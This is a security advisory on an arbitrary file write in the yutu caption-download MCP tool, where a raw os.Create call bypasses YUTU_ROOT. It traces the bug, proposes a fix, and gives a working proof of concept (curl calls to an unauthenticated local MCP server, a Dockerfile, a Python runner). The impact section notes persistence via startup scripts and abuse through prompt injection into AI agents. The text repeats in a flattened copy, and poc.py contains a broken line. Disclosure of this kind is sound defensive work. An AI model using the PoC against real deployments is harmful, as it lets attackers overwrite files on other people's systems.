Arbitrary File Write via MCP caption-download Tool
Summary
The caption-download MCP tool in yutu passes the caller-supplied file parameter directly to os.Create() at pkg/caption/caption.go:272 without any path validation, canonicalization, or confinement to the pkg.Root boundary (YUTU_ROOT). A local attacker — or any process able to reach the HTTP MCP server — can write arbitrary content to any path writable by the yutu process, entirely outside the intended working directory. This is a High severity vulnerability (CVSS 7.7) with high integrity and availability impact.
Details
yutu uses pkg.Root (backed by Go 1.24's os.OpenRoot) to restrict all file I/O to the YUTU_ROOT directory. Every other caption file-write path honours this boundary:
| Method |
Sink |
Confined? |
Caption.Insert() |
pkg.Root.Open(c.File) (caption.go:109) |
Yes |
Caption.Update() |
pkg.Root.Open(c.File) (caption.go:193) |
Yes |
Caption.Download() |
os.Create(c.File) (caption.go:272) |
No |
Caption.Download() is the sole outlier. The attacker-controlled file field flows without restriction from the MCP tool input schema to a raw os.Create() call:
- Source —
cmd/caption/download.go:32–41: downloadInSchema declares file as a required string field in the MCP JSON input schema.
- Binding —
cmd/caption/download.go:61–64: cobramcp.GenToolHandler maps MCP input to input.Download(writer).
- Sink —
pkg/caption/caption.go:272: os.Create(c.File) creates or truncates the file at the attacker-supplied path.
- Write —
pkg/caption/caption.go:280: file.Write(body) writes the downloaded caption bytes to that path.
// cmd/caption/download.go
var downloadInSchema = &jsonschema.Schema{
Required: []string{"ids", "file"}, // line 34
// ...
"file": {Type: "string", Description: fileUsage}, // line 40
}
// cobramcp.GenToolHandler binds MCP → handler (line 61-64)
cobramcp.GenToolHandler(downloadTool, func(input caption.Caption, writer io.Writer) error {
return input.Download(writer)
})
// pkg/caption/caption.go
body, err := io.ReadAll(res.Body) // line 267
file, err := os.Create(c.File) // line 272 ← unconfined sink
// ...
_, err = file.Write(body) // line 280
The caption-download tool is registered by default in init() at cmd/caption/download.go:52, and the HTTP MCP server starts with --auth defaulting to false (cmd/mcp.go:42), meaning no authentication is required for local HTTP callers.
Recommended fix:
--- a/pkg/caption/caption.go
+++ b/pkg/caption/caption.go
@@
- file, err := os.Create(c.File)
+ file, err := pkg.Root.OpenFile(c.File, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
if err != nil {
return errors.Join(errDownloadCaption, err)
}
PoC
Prerequisites:
- yutu
0.0.0-dev / commit 351c99d
- Valid
YUTU_CREDENTIAL and YUTU_CACHE_TOKEN available
- yutu MCP server running in HTTP mode
Docker-based reproduction (no live credentials needed):
The self-contained PoC builds a binary that exercises caption.Download() directly inside a container, with YUTU_ROOT=/tmp/yutu_safe_root as the confinement boundary.
# From the report workspace root:
docker build --no-cache -t yutu-vuln001-poc \
-f vuln-001/Dockerfile \
reports/mcp_49_eat-pray-ai__yutu
docker run --rm yutu-vuln001-poc
Expected output confirms:
pkg.Root.Open("/tmp/poc-arbitrary-write.txt") is correctly rejected with path escapes from parent (control).
caption.Download() with file="/tmp/poc-arbitrary-write.txt" succeeds and creates a 79-byte file outside YUTU_ROOT (exploit).
Live MCP server reproduction:
# Start the HTTP MCP server (no auth by default)
yutu mcp --mode http --port 8216
# Initialise session
curl -sD /tmp/yutu.headers \
-H 'Content-Type: application/json' \
-H 'Accept: application/json, text/event-stream' \
http://localhost:8216/mcp \
-d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"poc","version":"1"}}}' \
>/tmp/yutu.init
SID=$(awk 'tolower($1)=="mcp-session-id:"{print $2}' /tmp/yutu.headers | tr -d '\r')
# Exploit: write caption to arbitrary path
# Replace CAPTION_ID with a caption id accessible by the configured token
curl -s \
-H 'Content-Type: application/json' \
-H 'Accept: application/json, text/event-stream' \
${SID:+-H "Mcp-Session-Id: $SID"} \
http://localhost:8216/mcp \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"caption-download","arguments":{"ids":["CAPTION_ID"],"file":"/tmp/yutu-cve-poc.srt","tfmt":"srt"}}}'
# Verify file was written outside YUTU_ROOT
test -s /tmp/yutu-cve-poc.srt && ls -l /tmp/yutu-cve-poc.srt
Impact
This is an Arbitrary File Write vulnerability. Any principal that can invoke the caption-download MCP tool — including an unauthenticated local process when the HTTP MCP server is running with default settings (--auth false) — can write attacker-controlled bytes to any file path accessible to the yutu process. This bypasses the YUTU_ROOT confinement boundary that all other file-write operations in yutu respect.
Potential consequences include:
- Overwriting application binaries, configuration files, or shell startup scripts to achieve persistent code execution.
- Corrupting log files or database files to cause denial of service.
- Writing web-accessible files in deployments where yutu runs alongside a web server.
- Exploitable via prompt injection into an AI agent that uses the yutu MCP server, since the
file parameter is fully attacker-controlled with no guardrails.
Impacted parties: operators running yutu as an MCP server (HTTP mode, default configuration), AI agent pipelines that expose caption-download to untrusted input, and any user whose machine hosts a yutu process that a local attacker can reach.
Reproduction artifacts
Dockerfile
# VULN-001 PoC Dockerfile
# Build con: reports/mcp_49_eat-pray-ai__yutu/
# repo/ - the cloned yutu repository
# vuln-001/ - this workspace (Dockerfile, poc_main.go)
FROM golang:1.26 AS builder
WORKDIR /build
# Copy the yutu source tree (provides the vulnerable packages)
COPY repo/ .
# Inject PoC as a new command package (does not modify existing source)
RUN mkdir -p cmd/poc_exploit
COPY vuln-001/poc_main.go cmd/poc_exploit/main.go
# Build the PoC binary (static, no CGO needed)
RUN CGO_ENABLED=0 go build -o /poc ./cmd/poc_exploit/
# ── Runtime stage ──────────────────────────────────────────────────────────
FROM debian:12-slim
COPY --from=builder /poc /poc
# YUTU_ROOT defines the pkg.Root confinement boundary.
# The PoC writes to /tmp/poc-arbitrary-write.txt which is OUTSIDE this root,
# demonstrating the os.Create bypass.
ENV YUTU_ROOT=/tmp/yutu_safe_root
RUN mkdir -p /tmp/yutu_safe_root
CMD ["/poc"]
poc.py
#!/usr/bin/env python3
"""
VULN-001 PoC Runner
Exploit: Arbitrary File Write via MCP caption-download (CWE-73)
Target : pkg/caption/caption.go:272 -- os.Create(c.File) without pkg.Root confinement
Usage: python3 poc.py
"""
import os
import subprocess
import sys
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
CONTEXT_DIR = os.path.dirname(VULN_DIR) # mcp_49_eat-pray-ai__yutu/
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
IMAGE_NAME = "yutu-vuln001-poc"
def run(cmd, check=False, **kwargs):
print("$ " + " ".join(str(a) for a in cmd))
result = subprocess.run(cmd, =True, **kwargs)
return result
def main():
print("=" * 70)
print("VULN-001: Arbitrary File Write via MCP caption-download")
print("CWE-73 | pkg/caption/caption.go:272 | os.Create(c.File)")
print("=" * 70)
# ── Build ────────────────────────────────────────────────────────────────
build_cmd = [
"docker", "build",
"--no-cache",
"-t", IMAGE_NAME,
"-f", DOCKERFILE,
CONTEXT_DIR,
]
print("\n[Step 1] Building Docker image ...")
result = run(build_cmd, capture_output=False)
if result.returncode != 0:
print("\n[FAIL] Docker build failed.", file=sys.stderr)
sys.exit(1)
# ── Run ──────────────────────────────────────────────────────────────────
run_cmd = ["docker", "run", "--rm", IMAGE_NAME]
print("\n[Step 2] Running PoC container ...")
result = run(run_cmd, capture_output=True)
stdout = result.stdout or ""
stderr = result.stderr or ""
print(stdout, end="")
if stderr:
print(stderr, end="", file=sys.stderr)
# ── Verdict ──────────────────────────────────────────────────────────────
passed = (
result.returncode == 0
and "VULNERABILITY CONFIRMED" in stdout
and "PASS" in stdout
and "os.Create bypasses pkg.Root" in stdout
)
if passed:
print("\n[RESULT] PASS – vulnerability dynamically reproduced.")
else:
print(f"\n[RESULT] FAIL – container exit code {result.returncode}.", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
References
Arbitrary File Write via MCP
caption-downloadToolSummary
The
caption-downloadMCP tool in yutu passes the caller-suppliedfileparameter directly toos.Create()atpkg/caption/caption.go:272without any path validation, canonicalization, or confinement to thepkg.Rootboundary (YUTU_ROOT). A local attacker — or any process able to reach the HTTP MCP server — can write arbitrary content to any path writable by the yutu process, entirely outside the intended working directory. This is a High severity vulnerability (CVSS 7.7) with high integrity and availability impact.Details
yutu uses
pkg.Root(backed by Go 1.24'sos.OpenRoot) to restrict all file I/O to theYUTU_ROOTdirectory. Every other caption file-write path honours this boundary:Caption.Insert()pkg.Root.Open(c.File)(caption.go:109)Caption.Update()pkg.Root.Open(c.File)(caption.go:193)Caption.Download()os.Create(c.File)(caption.go:272)Caption.Download()is the sole outlier. The attacker-controlledfilefield flows without restriction from the MCP tool input schema to a rawos.Create()call:cmd/caption/download.go:32–41:downloadInSchemadeclaresfileas a requiredstringfield in the MCP JSON input schema.cmd/caption/download.go:61–64:cobramcp.GenToolHandlermaps MCP input toinput.Download(writer).pkg/caption/caption.go:272:os.Create(c.File)creates or truncates the file at the attacker-supplied path.pkg/caption/caption.go:280:file.Write(body)writes the downloaded caption bytes to that path.The
caption-downloadtool is registered by default ininit()atcmd/caption/download.go:52, and the HTTP MCP server starts with--authdefaulting tofalse(cmd/mcp.go:42), meaning no authentication is required for local HTTP callers.Recommended fix:
PoC
Prerequisites:
0.0.0-dev/ commit351c99dYUTU_CREDENTIALandYUTU_CACHE_TOKENavailableDocker-based reproduction (no live credentials needed):
The self-contained PoC builds a binary that exercises
caption.Download()directly inside a container, withYUTU_ROOT=/tmp/yutu_safe_rootas the confinement boundary.# From the report workspace root: docker build --no-cache -t yutu-vuln001-poc \ -f vuln-001/Dockerfile \ reports/mcp_49_eat-pray-ai__yutu docker run --rm yutu-vuln001-pocExpected output confirms:
pkg.Root.Open("/tmp/poc-arbitrary-write.txt")is correctly rejected withpath escapes from parent(control).caption.Download()withfile="/tmp/poc-arbitrary-write.txt"succeeds and creates a 79-byte file outsideYUTU_ROOT(exploit).Live MCP server reproduction:
Impact
This is an Arbitrary File Write vulnerability. Any principal that can invoke the
caption-downloadMCP tool — including an unauthenticated local process when the HTTP MCP server is running with default settings (--auth false) — can write attacker-controlled bytes to any file path accessible to the yutu process. This bypasses theYUTU_ROOTconfinement boundary that all other file-write operations in yutu respect.Potential consequences include:
fileparameter is fully attacker-controlled with no guardrails.Impacted parties: operators running yutu as an MCP server (HTTP mode, default configuration), AI agent pipelines that expose
caption-downloadto untrusted input, and any user whose machine hosts a yutu process that a local attacker can reach.Reproduction artifacts
Dockerfilepoc.pyReferences